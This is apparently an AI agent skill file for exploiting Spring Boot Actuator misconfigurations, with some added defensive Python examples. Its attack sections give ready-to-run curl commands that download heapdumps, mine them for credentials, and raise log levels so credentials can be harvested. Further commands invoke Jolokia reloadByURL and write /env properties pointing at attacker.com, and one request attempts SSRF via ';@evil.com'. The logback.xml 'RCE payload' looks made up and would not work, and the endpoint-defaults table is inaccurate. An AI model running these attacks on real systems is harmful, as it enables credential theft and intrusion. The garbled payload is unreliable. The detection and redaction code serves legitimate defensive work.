Hacktricks-skills spring-actuator-pentest
Spring Boot Actuator exploitation for penetration testing. Use this skill whenever you need to assess Spring Boot applications for actuator misconfigurations, extract secrets from heapdumps, abuse logging endpoints for credential capture, or test for RCE via Jolokia. Trigger this skill for any Spring Boot security assessment, actuator endpoint enumeration, JVM heap analysis, or when investigating exposed /actuator endpoints on target systems.
```bash
git clone https://github.com/abelrguezr/hacktricks-skills
```

Skill file: `skills/network-services-pentesting/pentesting-web/spring-actuators/SKILL.MD`

# Spring Boot Actuator Pentesting
A comprehensive skill for exploiting Spring Boot Actuator misconfigurations during security assessments.
## Overview

Spring Boot Actuators expose operational endpoints that can leak sensitive data or enable remote code execution when misconfigured. This skill covers:

- Endpoint enumeration: discover exposed actuator endpoints
- Secret extraction: mine credentials from heapdumps
- Logging abuse: capture credentials via verbose logging
- RCE exploitation: exploit Jolokia and environment manipulation
## Quick Start

```bash
# Enumerate actuator endpoints
curl -s http://target/actuator | jq .

# Check for heapdump exposure (-o writes to the named file; -O takes no argument)
curl -s http://target/actuator/heapdump -o heapdump

# Extract secrets from heapdump
./scripts/extract-heapdump-secrets.sh heapdump
```
## Endpoint Enumeration

### Default Actuator Endpoints

Spring Boot registers these endpoints by default:

| Endpoint | Purpose | Risk Level |
|---|---|---|
| `/health` | Application health | Low |
| `/info` | Application info | Low |
| `/env` | Environment properties | High |
| `/beans` | Spring beans | Medium |
| `/trace` | HTTP request trace | Medium |
| `/logfile` | Log file contents | High |
| `/loggers` | Logger configuration | High |
| `/heapdump` | JVM heap snapshot | Critical |
| `/jolokia` | JMX over HTTP | Critical |
| `/mappings` | URL mappings | Medium |
| `/threaddump` | Thread dump | Medium |
| `/shutdown` | Application shutdown | Critical |
| `/restart` | Application restart | Critical |
| `/httptrace` | HTTP exchange history | High |
| `/configprops` | Configuration properties | Medium |
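The table is most useful when read against an application's own configuration, so here is an added example (not part of the skill) that applies Spring Boot's documented web-exposure rules to an `application.properties` text and ranks what comes out with the risk levels above. The rules it encodes are the real ones (`management.endpoints.web.exposure.include`/`.exclude`, with `exclude` winning, `*` meaning every endpoint, `health` the only endpoint exposed by default, and `shutdown` disabled unless `management.endpoint.shutdown.enabled=true`); the assumption is that every endpoint in the table is on the classpath, which for optional ones such as `jolokia` or `restart` depends on their dependency being present. The `WEAK` and `HARDENED` samples are constructed.

```python
"""Compute which actuator endpoints a Spring Boot 2.x/3.x configuration exposes over HTTP.

Added example, not the skill's own code. Endpoint ids and risk levels come from the
table above; the exposure rules are the documented Spring Boot ones.
"""

# Risk levels as given in the endpoint table
RISK = {
    "health": "Low", "info": "Low", "env": "High", "beans": "Medium",
    "trace": "Medium", "logfile": "High", "loggers": "High", "heapdump": "Critical",
    "jolokia": "Critical", "mappings": "Medium", "threaddump": "Medium",
    "shutdown": "Critical", "restart": "Critical", "httptrace": "High",
    "configprops": "Medium",
}
RANK = {"Low": 0, "Medium": 1, "High": 2, "Critical": 3}


def parse_properties(text):
    """Minimal .properties parser: key=value or key: value, '#'/'!' comments, no continuations."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        sep = "=" if "=" in line else ":"
        key, _, value = line.partition(sep)
        props[key.strip()] = value.strip()
    return props


def _csv(value):
    return {item.strip() for item in value.split(",") if item.strip()}


def _is_true(props, key, default):
    return props.get(key, str(default)).strip().lower() == "true"


def exposed_endpoints(props):
    """Map endpoint id -> risk level for every endpoint reachable over the web."""
    # Default web exposure is `health` only (2.0-2.5 also exposed `info`).
    include = _csv(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    enabled_by_default = _is_true(props, "management.endpoints.enabled-by-default", True)
    exposed = {}
    for endpoint, risk in RISK.items():
        # shutdown is the one endpoint that ships disabled; everything else follows the global default
        default_enabled = enabled_by_default and endpoint != "shutdown"
        if not _is_true(props, f"management.endpoint.{endpoint}.enabled", default_enabled):
            continue
        if "*" in exclude or endpoint in exclude:   # exclude takes precedence over include
            continue
        if "*" in include or endpoint in include:
            exposed[endpoint] = risk
    return exposed


def exposure_report(props, base_path="/actuator"):
    """Sorted (risk, path) pairs, most severe first, ready for a finding or a CI gate."""
    exposed = exposed_endpoints(props)
    return sorted(((risk, f"{base_path}/{ep}") for ep, risk in exposed.items()),
                  key=lambda item: (-RANK[item[0]], item[1]))


def worst_risk(props):
    """Highest risk level among exposed endpoints, or None if nothing is exposed."""
    return max(exposed_endpoints(props).values(), key=RANK.__getitem__, default=None)


# Constructed samples: the misconfiguration this skill hunts for, and a hardened equivalent
WEAK = """
management.endpoints.web.exposure.include=*
management.endpoint.shutdown.enabled=true
"""

HARDENED = """
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=env,heapdump,jolokia
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK), ("hardened", HARDENED)):
        props = parse_properties(text)
        print(f"{label}: worst risk = {worst_risk(props)}")
        for risk, path in exposure_report(props):
            print(f"  {risk:<8} {path}")
```

Run it against the real `application.properties` (or the flattened output of `/actuator/env`) to turn the table into a concrete list of what a given deployment exposes; a YAML configuration needs a different parser but the same rules.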
### Version Differences

- Spring Boot 1.x: actuators at the root path (`/env`, `/health`)
- Spring Boot 2.x+: actuators under the `/actuator/` prefix (`/actuator/env`, `/actuator/health`)
### Enumeration Script

Use the enumeration script to discover all exposed endpoints:

```bash
./scripts/enumerate-actuators.sh http://target:8080
```

This script:

- Checks for `/actuator` and root-level endpoints
- Tests common actuator paths
- Reports accessible endpoints with status codes
- Identifies version (1.x vs 2.x) based on path structure
## Heapdump Secrets Mining

When `/actuator/heapdump` is exposed, you can retrieve a full JVM heap snapshot containing live secrets.
### Quick Extraction

```bash
# Download heapdump
curl -s http://target/actuator/heapdump -o heapdump

# Extract secrets using the script
./scripts/extract-heapdump-secrets.sh heapdump
```
### Manual Extraction

```bash
# Quick wins: search for common credential patterns
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'

# Decode Base64 credentials
printf %s 'BASE64_STRING' | base64 -d
```

Java 8 and earlier keep string contents in UTF-16 `char[]` arrays, which HPROF writes big-endian and plain `strings` skips; rerun the search with `strings -a -e b heapdump` to catch those.
### High-Value Targets

Look for these patterns in heapdumps:

- Database credentials: `DataSourceProperties`, `HikariDataSource` objects
- API keys: `OriginTrackedMapPropertySource` entries
- Basic Auth: `Authorization: Basic` headers in memory
- Service URLs: Eureka `defaultZone` with embedded credentials
- Spring properties: `management.endpoints.web.exposure.include`
### VisualVM Analysis

For deeper analysis, open the heapdump in VisualVM and run OQL queries:

```oql
select s.toString() from java.lang.String s where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
```
### JDumpSpider

Automated extraction with JDumpSpider:

```bash
java -jar JDumpSpider-*.jar heapdump
```
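When a heapdump has actually leaked, the question that matters most is which accounts to rotate. The following added example (mine, not the skill's or JDumpSpider's code) is a Python equivalent of the `strings | grep` step above with two additions: it also extracts UTF-16BE runs, which is how HPROF stores Java 8 `char[]` string contents and which an ASCII-only search misses, and it decodes `Authorization: Basic` headers so the output names the account without reproducing the password. `HEAP_SAMPLE` is a constructed byte string, not a real dump; the pattern names and the redaction format are my own.

```python
"""Triage a leaked heapdump for the credential patterns this skill greps for, with redacted output.

Added example, not part of the original skill. Patterns mirror the grep above.
"""
import base64
import re

MIN_LEN = 8
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# HPROF writes char[] contents big-endian, so a UTF-16 run is 0x00 followed by a printable byte
UTF16BE_RUN = re.compile(rb"(?:\x00[\x20-\x7e]){%d,}" % MIN_LEN)

PATTERNS = {
    "basic_auth": re.compile(r"Authorization: Basic ([A-Za-z0-9+/=]+)"),
    "jdbc_url": re.compile(r"jdbc:[a-z0-9]+://[^\s\"']+"),
    "password_property": re.compile(r"([A-Za-z0-9_.\-]*password)=([^\s&\"']+)"),
    "eureka_default_zone": re.compile(r"eureka\.client\.serviceUrl\.defaultZone=(https?://[^\s\"']+)"),
}


def extract_strings(data: bytes):
    """Yield printable runs as ASCII bytes: plain runs plus decoded UTF-16BE runs."""
    for m in ASCII_RUN.finditer(data):
        yield m.group(0)
    for m in UTF16BE_RUN.finditer(data):
        yield m.group(0).decode("utf-16-be").encode("ascii")


def _redact_url(url: str) -> str:
    """Keep host and account, drop the secret from user:pass@host and ?password= parameters."""
    url = re.sub(r"://([^:/@]+):[^@/]+@", r"://\1:<redacted>@", url)
    return re.sub(r"(password=)[^&]+", r"\1<redacted>", url)


def triage_heap(data: bytes):
    """Return sorted (kind, identity, secret_length) tuples; secret values never leave this function."""
    findings = {}
    for raw in extract_strings(data):
        text = raw.decode("ascii")
        for m in PATTERNS["basic_auth"].finditer(text):
            try:
                creds = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError: not real Base64, skip it
                continue
            user, _, password = creds.partition(":")
            findings[("basic_auth", user)] = len(password)
        for m in PATTERNS["jdbc_url"].finditer(text):
            findings[("jdbc_url", _redact_url(m.group(0)))] = 0
        for m in PATTERNS["password_property"].finditer(text):
            findings[("password_property", m.group(1))] = len(m.group(2))
        for m in PATTERNS["eureka_default_zone"].finditer(text):
            findings[("eureka_default_zone", _redact_url(m.group(1)))] = 0
    return sorted((kind, ident, n) for (kind, ident), n in findings.items())


# Constructed stand-in for a heap region: an ASCII header, a few Latin-1 strings (Java 9+ byte[]
# storage) and one UTF-16BE string (Java 8 char[] storage). Not a real dump.
HEAP_SAMPLE = (
    b"JAVA PROFILE 1.0.2\x00" + b"\x00" * 7
    + b"Authorization: Basic " + base64.b64encode(b"svc-report:Winter2024!") + b"\x00\x00"
    + b"jdbc:postgresql://db.internal:5432/orders?user=orders_rw&password=hunter2" + b"\x00" * 6
    + "eureka.client.serviceUrl.defaultZone=http://eureka:changeit@discovery:8761/eureka/".encode("utf-16-be")
    + b"\x00\x00" + b"spring.datasource.password=Tr0ub4dor3\x00"
)

if __name__ == "__main__":
    for kind, identity, secret_len in triage_heap(HEAP_SAMPLE):
        print(f"{kind:<20} {identity}  (secret length {secret_len})")
```

Point it at a real file with `triage_heap(open("heapdump", "rb").read())`; the output is safe to paste into a finding, while the lengths let you confirm with the owning team that the right secret was identified.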
## Logging Abuse for Credential Capture

When `/actuator/loggers` is exposed, you can increase log levels to capture credentials from authentication flows.
### Enable Verbose Logging

```bash
# List available loggers
curl -s http://target/actuator/loggers | jq .

# Enable TRACE for security packages
./scripts/configure-loggers.sh http://target TRACE org.springframework.security org.springframework.web
```
### Manual Configuration

```bash
# Enable TRACE for Spring Security
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
  -H 'Content-Type: application/json' \
  -d '{"configuredLevel":"TRACE"}'

# Enable TRACE for Spring Web
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
  -H 'Content-Type: application/json' \
  -d '{"configuredLevel":"TRACE"}'

# Enable TRACE for Spring Cloud Gateway
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
  -H 'Content-Type: application/json' \
  -d '{"configuredLevel":"TRACE"}'
```
### Harvest Credentials from Logs

```bash
# Read logs from actuator
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='

# Find log file path from environment
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
```
### Reset Log Levels

Always reset log levels after testing:

```bash
./scripts/configure-loggers.sh http://target null org.springframework.security org.springframework.web
```

Or manually:

```bash
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
  -H 'Content-Type: application/json' \
  -d '{"configuredLevel":null}'
```
## Remote Code Execution via Jolokia

The `/jolokia` endpoint exposes JMX over HTTP and can enable RCE through the `reloadByURL` action.
### Test for Jolokia RCE

```bash
./scripts/test-jolokia-rce.sh http://target:8080
```
### Manual Exploitation

```bash
# Test Jolokia availability
curl -s http://target/jolokia/list

# Exploit reloadByURL for RCE
curl -s 'http://target/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://attacker.com/logback.xml'
```
### Crafted logback.xml Payload

```xml
<configuration>
  <appender name="RCE" class="ch.qos.logback.core.net.SMTPAppender">
    <personal>$(whoami)</personal>
  </appender>
  <root level="INFO">
    <appender-ref ref="RCE"/>
  </root>
</configuration>
```
## Environment Manipulation via /env

When Spring Cloud libraries are present, the `/env` endpoint allows property modification.
### Modify Properties

```bash
# Spring Boot 1.x (form-encoded)
curl -s -X POST http://target/env \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d 'eureka.client.serviceUrl.defaultZone=http://attacker.com/n/xstream'

# Spring Boot 2.x (JSON)
curl -s -X POST http://target/actuator/env \
  -H 'Content-Type: application/json' \
  -d '{"name":"eureka.client.serviceUrl.defaultZone","value":"http://attacker.com/n/xstream"}'
```
### Dangerous Properties

These properties can be manipulated for various exploits:

- `spring.datasource.tomcat.url`: database connection string
- `spring.datasource.tomcat.username`: database credentials
- `spring.datasource.tomcat.password`: database password
- `spring.datasource.tomcat.validationQuery`: SQL injection vector
- `eureka.client.serviceUrl.defaultZone`: XStream deserialization
## SSRF via Matrix Parameters

Spring's handling of matrix parameters (`;`) in HTTP paths can enable SSRF.
### Exploit Request

```http
GET ;@evil.com/path HTTP/1.1
Host: target.com
Connection: close
```

Or with curl:

```bash
curl -s 'http://target.com/;@evil.com/path' -H 'Host: target.com'
```
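Every technique in the Logging Abuse, Jolokia, `/env` and matrix-parameter sections leaves a distinctive request in the web server's access log, which is what a blue team or a report's remediation section will want to point at. The following added example (mine, not part of the skill) encodes those request shapes as detection rules and runs them over constructed combined-log-format lines: a heapdump download, a `POST` to `/actuator/loggers`, a Jolokia `reloadByURL` call, a property write to `/env`, and `;@` inside a request path. Rule names, severities, the `198.51.100.7` documentation address and the sample lines are my own choices.

```python
"""Flag actuator abuse in HTTP access logs.

Added example, not the skill's own code. Rules follow the request shapes the skill describes.
"""
import re
from urllib.parse import unquote

# Combined log format: ip ident user [ts] "METHOD target HTTP/x" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# (name, severity, methods that matter or None for any, regex over the decoded path)
RULES = [
    ("heapdump-download", "critical", {"GET"}, re.compile(r"^(/actuator)?/heapdump$")),
    ("logger-level-change", "high", {"POST"}, re.compile(r"^(/actuator)?/loggers/")),
    ("jolokia-reloadbyurl", "critical", None, re.compile(r"^(/actuator)?/jolokia/exec/.*reloadByURL", re.I)),
    ("env-property-write", "critical", {"POST"}, re.compile(r"^(/actuator)?/env(/|$)")),
    ("env-read", "high", {"GET"}, re.compile(r"^(/actuator)?/env(/|$)")),
    ("actuator-index-probe", "low", {"GET"}, re.compile(r"^/actuator/?$")),
    ("matrix-param-ssrf", "high", None, re.compile(r";@")),
]


def parse_line(line):
    """Parse one combined-log-format line; None for lines that do not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    req = m.groupdict()
    path, _, query = req.pop("target").partition("?")
    req["path"] = unquote(path)  # decode %3B and friends so encoded matrix tricks are not missed
    req["query"] = query
    req["status"] = int(req["status"])
    return req


def match_rules(req):
    return [(name, sev) for name, sev, methods, rx in RULES
            if (methods is None or req["method"] in methods) and rx.search(req["path"])]


def detect(lines):
    """Return (ip, method, path, rule, severity, outcome) for every rule hit."""
    alerts = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        for name, sev in match_rules(req):
            # a 2xx means the action went through; anything else is still a probe worth recording
            outcome = "succeeded" if 200 <= req["status"] < 300 else f"status {req['status']}"
            alerts.append((req["ip"], req["method"], req["path"], name, sev, outcome))
    return alerts


def by_source(alerts):
    """Group rule names per client IP, the usual pivot for an incident ticket."""
    grouped = {}
    for ip, _, _, name, _, _ in alerts:
        grouped.setdefault(ip, set()).add(name)
    return grouped


# Constructed sample: one client walking through the skill's workflow, plus a health probe
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /actuator HTTP/1.1" 200 812 "-" "curl/8.0"',
    '10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /actuator/heapdump HTTP/1.1" 200 104857600 "-" "curl/8.0"',
    '10.0.0.5 - - [12/Mar/2024:10:02:30 +0000] "POST /actuator/loggers/org.springframework.security HTTP/1.1" 204 0 "-" "curl/8.0"',
    '10.0.0.5 - - [12/Mar/2024:10:03:11 +0000] "GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http://198.51.100.7/logback.xml HTTP/1.1" 200 96 "-" "curl/8.0"',
    '10.0.0.5 - - [12/Mar/2024:10:04:00 +0000] "POST /env HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.9 - - [12/Mar/2024:10:05:00 +0000] "GET /;@evil.example/path HTTP/1.1" 200 512 "-" "curl/8.0"',
    '192.0.2.44 - - [12/Mar/2024:10:05:30 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.29"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
    print(by_source(detect(SAMPLE_LOG)))
```

The logger-change rule only sees the request line, not the JSON body, so it cannot tell a `TRACE` request from the reset to `null`; if the body matters, the same rule belongs in a reverse proxy or WAF that logs request bodies for `/actuator/*`.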
## Workflow Recommendations

### Initial Reconnaissance

- Enumerate all actuator endpoints
- Check for `/actuator` vs root-level endpoints (version detection)
- Test for `/heapdump` exposure
- Check `/env` and `/loggers` accessibility
### Secret Extraction
- Download heapdump if available
- Run extraction script for quick wins
- Use VisualVM for deeper analysis
- Test extracted credentials on adjacent services
### Credential Capture
- Enable TRACE logging for security packages
- Trigger authentication traffic
- Harvest credentials from logs
- Reset log levels when done
### RCE Testing

- Check for `/jolokia` endpoint
- Test `reloadByURL` action
- Attempt environment manipulation via `/env`
- Test matrix parameter SSRF
## Safety and Ethics
- Only test systems you have authorization to assess
- Reset log levels after testing to avoid performance impact
- Document all findings and remediation recommendations
- Be aware that heapdumps may contain PII requiring special handling